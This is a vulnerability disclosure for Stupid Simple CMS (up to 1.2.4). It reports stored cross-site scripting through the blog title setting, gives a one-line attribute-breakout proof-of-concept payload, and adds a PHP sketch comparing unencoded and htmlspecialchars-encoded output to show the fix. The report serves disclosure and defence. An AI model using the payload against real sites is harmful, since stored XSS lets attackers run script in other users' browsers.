product: Stupid Simple CMS ( Blogger )
download link: https://github.com/codelyfe/Stupid-Simple-CMS
version: <=1.2.4
There is a Cross-Site Scripting (XSS) vulnerability in the blog title of the settings.
poc:
```
"><img src=1 onerror=alert(1)>
```
Succeeded:
![2](https://github.com/kilooooo/cms/assets/52652352/bec69f2a-b9b6-4603-acbd-2bb84e862871)
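
The PoC starts with `">`, which is the shape of a payload that closes a double-quoted HTML attribute before opening a new tag. The PHP sketch below is an added example, not code from Stupid Simple CMS: the function names, the `blog_title` field name and the assumption that the title is echoed into a double-quoted `value` attribute are all hypothetical. It renders the same payload with and without output encoding and parses both results to show which one produces an extra element with an event handler.

```php
<?php
declare(strict_types=1);

// Hypothetical rendering of the settings form field; all names are assumptions.

// Vulnerable pattern: stored title concatenated into a double-quoted attribute.
function render_title_unsafe(string $title): string
{
    return '<input type="text" name="blog_title" value="' . $title . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
function render_title_safe(string $title): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="blog_title" value="' . $encoded . '">';
}

// Parse a fragment with an HTML parser and list every element and every
// on* attribute, so an attribute breakout becomes visible.
function summarize_markup(string $html): array
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $tags = [];
    $handlers = [];
    $body = $doc->getElementsByTagName('body')->item(0);
    foreach ($body->getElementsByTagName('*') as $el) {
        $tags[] = $el->nodeName;
        foreach ($el->attributes as $attr) {
            if (stripos($attr->nodeName, 'on') === 0) {
                $handlers[] = $el->nodeName . '@' . $attr->nodeName;
            }
        }
    }
    return ['tags' => $tags, 'handlers' => $handlers];
}

$payload = '"><img src=1 onerror=alert(1)>'; // PoC string from the report above

foreach (['unsafe' => 'render_title_unsafe', 'safe' => 'render_title_safe'] as $label => $fn) {
    $html = $fn($payload);
    $summary = summarize_markup($html);
    printf("%-6s %s\n       tags=[%s] handlers=[%s]\n", $label, $html,
        implode(',', $summary['tags']), implode(',', $summary['handlers']));
}
```

Encoding belongs at every place the title is written into HTML, not only in the settings form, because the stored value is the same wherever it is rendered.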